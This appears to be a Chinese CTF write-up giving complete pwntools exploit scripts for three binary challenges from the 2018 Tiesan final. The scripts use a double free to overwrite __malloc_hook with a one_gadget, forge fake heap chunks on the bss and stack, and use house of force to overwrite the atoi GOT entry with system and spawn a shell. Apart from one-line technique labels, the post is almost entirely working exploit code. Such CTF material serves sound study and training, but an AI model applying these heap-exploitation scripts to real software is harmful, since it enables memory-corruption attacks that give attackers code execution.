2018铁三赛决赛三道pwn题exp
2018铁三赛决赛三道pwn题exp
0x01 littlenote
double free和写malloc_hook
from pwn import *
#context.log_level="debug"
p = process("./littlenote")
libc = ELF("./libc.so.6")
def add(data):
p.recvuntil("choice:")
p.sendline(str(1))
p.recvuntil("your note")
p.send(data)
p.recvuntil("keep your note?")
p.send("Y\x00")
def show(idx):
p.recvuntil("choice:")
p.sendline(str(2))
p.recvuntil("show?")
p.sendline(str(idx))
def dele(idx):
p.recvuntil("choice:")
p.sendline(str(3))
p.recvuntil("delete?")
p.sendline(str(idx))
add("A"*0x10)
add("B"*0x10)
add("C"*0x10)
add("D"*0x10+p64(0)+p64(0x51))
dele(1)
dele(0)
dele(1)
show(0)
p.recvline()
heap = u64(p.recvuntil("\n",drop=True).ljust(8,"\x00"))
print hex(heap)
add(p64(heap+0x10)+p64(0x71))
add("\x00")
add(p64(heap+0x10)+p64(0x71))
add("F"*0x50+p64(0)+p64(0x91))
dele(2)
show(2)
p.recvline()
main = u64(p.recvuntil("\n",drop=True).ljust(8,"\x00"))
libc_addr = (main - 88) - 0x3C4B20
print hex(libc_addr)
malloc_hook = libc_addr + libc.symbols['__malloc_hook']
print hex(malloc_hook)
add("1"*0x10) #8
add("2"*0x10) #9
add("3"*0x10)
dele(9)
dele(8)
dele(9)
add(p64(malloc_hook-27-0x8))
add("5"*0x10)
add(p64(malloc_hook-27-0x8))
one_gadget = 0xf0274
add("A"*19+p64(libc_addr + one_gadget))
p.recvuntil(":")
p.sendline(str(1))
p.interactive()
0x02 bookstore
在bss段和stack上伪造chunk
from pwn import *
def ru(data,drop=False):
return p.recvuntil(data,drop=drop)
def rl():
return p.recvline()
def ra():
return p.recvall()
def r(l):
return p.recv(l)
def sl(data):
p.sendline(data)
def s(data):
p.send(data)
def ga(data,rd="\x0a"):
ru(data)
return u64(ru(rd,drop=True).ljust(8,"\x00"))
def g():
gdb.attach(p)
raw_input()
def ri():
raw_input()
def add(author,l,book):
ru("choice:")
sl(str(1)+"\x00"*0x7)
ru("author")
sl(author)
ru("long")
sl(str(l))
ru("book?")
sl(book)
def read(idx):
ru(":")
sl(str(3))
ru("sell")
sl(str(idx))
def sell(idx):
ru(":")
sl(str(2))
ru("sell")
sl(str(idx))
def et():
ru(":")
sl(str(4))
if __name__ == '__main__':
#context.log_level = "debug"
libc = ELF("./libc.so.6")
p = process("./bookstore")
add("A"*0x10,0x10,"1"*0x8)
add("B"*0x10,0x40,"2"*0x10)
add("C"*0x10,0x40,"3"*0x10)
add("D"*0x10,0x40,"4"*0x10)
sell(0)
add(p64(0)+p64(0x51),0,p64(0)*3+p64(0xa1))
sell(1)
add("W"*0x10,0x40,'6'*8)
read(1)
main = ga("6"*0x8)
libc_addr = (main - 232) - 0x3C4B20
print hex(libc_addr)
env = libc_addr + libc.symbols['environ']
print hex(env)
sell(0)
sell(1)
add(p64(0)+p64(0x51),0,p64(0)*3+p64(0x51)+p64(0x602060))
add("X"*0x10,0x40,'2'*0x10)
add("Z"*0x10,0x40,p64(0)*2+p64(env))
read(0)
stack = ga("name:")
print hex(stack)
fake = stack - 0x110
print hex(fake)
one = libc_addr + 0x45216
add("A"*0x10,0x10,"1"*0x8)
add("B"*0x10,0x20,"2"*0x10)
add("C"*0x10,0x20,"3"*0x10)
sell(5)
sell(6)
add('s'*0x10,0,p64(0)*3+p64(0x31)+p64(fake))
add("B"*0x10,0x20,"2"*0x10)
add('A'*0x10,0x20,p64(0)+p64(0x400c70)+p64(one))
et()
p.interactive()
0x03 myhouse
一个任意地址写null漏洞和house of force
from pwn import *
def ru(data,drop=False):
return p.recvuntil(data,drop=drop)
def rl():
return p.recvline()
def ra():
return p.recvall()
def r(l):
return p.recv(l)
def sl(data):
p.sendline(data)
def s(data):
p.send(data)
def ga(data,rd="\x0a"):
ru(data)
return u64(ru(rd,drop=True).ljust(8,"\x00"))
def g():
gdb.attach(p)
raw_input()
def ri():
raw_input()
def gp():
print proc.pidof(p)[0]
ri()
def add(n,hn,hs1,hs,hd):
ru("What's your name?")
s(n)
ru("name of your house?")
s(hn)
ru("size of your house?")
s(str(hs1))
ru("Too large!")
s(str(hs))
ru("description:\n")
s(hd)
def broom(rs):
ru("choice:")
sl(str(1))
ru("size of your room")
sl(str(rs))
def droom(rd):
ru("choice:")
sl(str(2))
ru("more shining")
sl(rd)
def view():
ru("choice:")
sl(str(3))
if __name__ == '__main__':
# context.log_level = "debug"
libc = ELF("./libc.so.6")
p = process("./myhouse")
top = 0x3c4b78
size = 0x201000
ps = size - 0x10 + top + 1
# mmap to libc before, modify top chunk low bit to null
add("A"*0x20 ,"1"*0xf0+p64(0)+p64(0xffffffffffffffff),ps,0x200000,'2'*0x20)
view()
heap = ga("A"*0x20)
bss = 0x6020b0
hs = bss - (heap + 0x100)
print hex(heap)
print hex(hs)
# modify top chunk to bss segment
broom(hs)
# alloc chunk in bss segment
broom(0x60)
atoi = 0x602058
pay = p64(atoi) + p64(atoi) + p64(8)
# modify the ptr to got
droom(pay)
# leak atoi really addring
view()
atoi_addr = ga("description:\x0a")
print hex(atoi_addr)
system_addr = atoi_addr -libc.symbols['atoi'] + libc.symbols['system']
print hex(system_addr)
# modify got of atoi to system addr
droom(p64(system_addr))
ru("choice:")
# get shell
s("/bin/sh\x00")
ru("choice:")
p.interactive()
